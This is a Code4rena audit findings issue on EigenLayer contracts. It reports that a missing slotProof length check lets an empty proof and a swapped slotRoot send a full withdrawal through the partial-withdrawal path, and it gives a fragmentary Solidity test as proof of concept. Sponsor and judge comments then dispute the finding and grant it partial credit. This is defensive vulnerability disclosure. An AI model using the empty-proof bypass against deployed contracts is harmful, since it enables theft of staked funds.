code-423n4 / 2023-04-eigenlayer-findings

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The length of proofs.slotProof is not checked in the verifyWithdrawalProofs function, allowing a malicious EigenPod Owner to be issued only shares via StrategyManager and withdraw all their money #457

Closed code423n4 closed 1 year ago

code423n4 commented 1 year ago

Lines of code

Vulnerability details


Below is a portion of the verifyAndProcessWithdrawal function.

// Verifying the withdrawal as well as the slot
        BeaconChainProofs.verifyWithdrawalProofs(beaconStateRoot, withdrawalProofs, withdrawalFields);
        // Verifying the validator fields, specifically the withdrawable epoch
        BeaconChainProofs.verifyValidatorFields(validatorIndex, beaconStateRoot, validatorFieldsProof, validatorFields);

        uint64 withdrawalAmountGwei = Endian.fromLittleEndianUint64(withdrawalFields[BeaconChainProofs.WITHDRAWAL_VALIDATOR_AMOUNT_INDEX]);

        //check if the withdrawal occured after mostRecentWithdrawalBlockNumber
        uint64 slot = Endian.fromLittleEndianUint64(withdrawalProofs.slotRoot);

         * if the validator's withdrawable epoch is less than or equal to the slot's epoch, then the validator has fully withdrawn because
         * a full withdrawal is only processable after the withdrawable epoch has passed.
        // reference: uint64 withdrawableEpoch = Endian.fromLittleEndianUint64(validatorFields[BeaconChainProofs.VALIDATOR_WITHDRAWABLE_EPOCH_INDEX]);
        if (Endian.fromLittleEndianUint64(validatorFields[BeaconChainProofs.VALIDATOR_WITHDRAWABLE_EPOCH_INDEX]) <= slot/BeaconChainProofs.SLOTS_PER_EPOCH) {
            _processFullWithdrawal(withdrawalAmountGwei, validatorIndex, beaconChainETHStrategyIndex, podOwner, validatorStatus[validatorIndex]);
        } else {
            _processPartialWithdrawal(slot, withdrawalAmountGwei, validatorIndex, podOwner);

withdrawalProofs is used once as a parameter to the verifyWithdrawalProofs function, and withdrawalProofs.slot is a value that can determine whether to run the _processFullWithdrawal or _processPartialWithdrawal function.

Consider the fullWithdrawalProof.json given as test data.

"slotRoot": "0xd6a8000000000000000000000000000000000000000000000000000000000000",
"blockHeaderRoot": "0x180e63f75d01ca01a056dfc42dc3a30d0775e1da8e51001fbb2a3d68d96c5f14", // changed slotRoot
"ValidatorFields": [
        "0x6604000000000000000000000000000000000000000000000000000000000000" // validatorFields[BeaconChainProofs.VALIDATOR_WITHDRAWABLE_EPOCH_INDEX]

Based on the test data above, originally slotRoot/BeaconChainProofs.SLOTS_PER_EPOCH should be greater than validatorFields[BeaconChainProofs.VALIDATOR_WITHHDRAWABLE_EPOCH_INDEX] and the _processFullWithdrawal function should be executed. However, with the ability to manipulate the slotRoot, the _processPartialWithdrawal function can be executed, which means that ETH can be withdrawn immediately without any latency, even if it negatively affects the middleware.

I'm sorry for the lack of explanation, I was just looking for a vulnerability and writing a report while I was nearing the end of my time. If you need a detailed explanation, please call windowhan001 in the eigenlayer contest channel.

Proof of Concept

function testFullWithdrawalProof() public {
        BeaconChainProofs.WithdrawalProofs memory proofs = _getWithdrawalProof();
        withdrawalFields = getWithdrawalFields();   
        validatorFields = getValidatorFields();

        Relayer relay = new Relayer();

        bytes32 beaconStateRoot = getBeaconStateRoot();
        relay.verifyWithdrawalProofs(beaconStateRoot, proofs, withdrawalFields);

function _getWithdrawalProof() internal returns(BeaconChainProofs.WithdrawalProofs memory) {
        //make initial deposit
        eigenPodManager.stake{value: stakeAmount}(pubkey, signature, depositDataRoot);

            bytes32 beaconStateRoot = getBeaconStateRoot();
            //set beaconStateRoot
            bytes32 blockHeaderRoot = getBlockHeaderRoot();
            bytes32 blockBodyRoot = getBlockBodyRoot();
            bytes32 slotRoot = getBlockHeaderRoot(); // Changed!!!!
            bytes32 blockNumberRoot = getBlockNumberRoot();
            bytes32 executionPayloadRoot = getExecutionPayloadRoot();

            uint256 withdrawalIndex = getWithdrawalIndex();
            uint256 blockHeaderRootIndex = getBlockHeaderRootIndex();

            BeaconChainProofs.WithdrawalProofs memory proofs = BeaconChainProofs.WithdrawalProofs(
            return proofs;
function getSlotProof() public returns(bytes32[] memory){ // Changed!!!
        //for (uint i = 0; i < 3; i++) {
        //    prefix = string.concat(".SlotProof[", string.concat(vm.toString(i), "]"));
        //    slotProof[i] = (stdJson.readBytes32(proofConfigJson, prefix));
        bytes32[] memory emptyArray = new bytes32[](0);
        return emptyArray;

Tools Used

Manual Audit

Recommended Mitigation Steps

Assessed type


c4-pre-sort commented 1 year ago

0xSorryNotSorry marked the issue as primary issue

c4-sponsor commented 1 year ago

Sidu28 marked the issue as sponsor disputed

Sidu28 commented 1 year ago

No method to manipulate the slot root was supplied as part of this report. It is checked against.

c4-judge commented 1 year ago

GalloDaSballo marked the issue as unsatisfactory: Insufficient proof

GalloDaSballo commented 1 year ago

Asking Warden to add more proof, closing in the meantime

c4-judge commented 1 year ago

GalloDaSballo marked the issue as duplicate of #388

c4-judge commented 1 year ago

GalloDaSballo marked the issue as partial-50

GalloDaSballo commented 1 year ago

The warden forgot to say that you can pass an empty proof to pass the validation, but they did it in the POC

Awarding 50% because the finding was "saved" as a dup as the contents of this report alone were too obtuse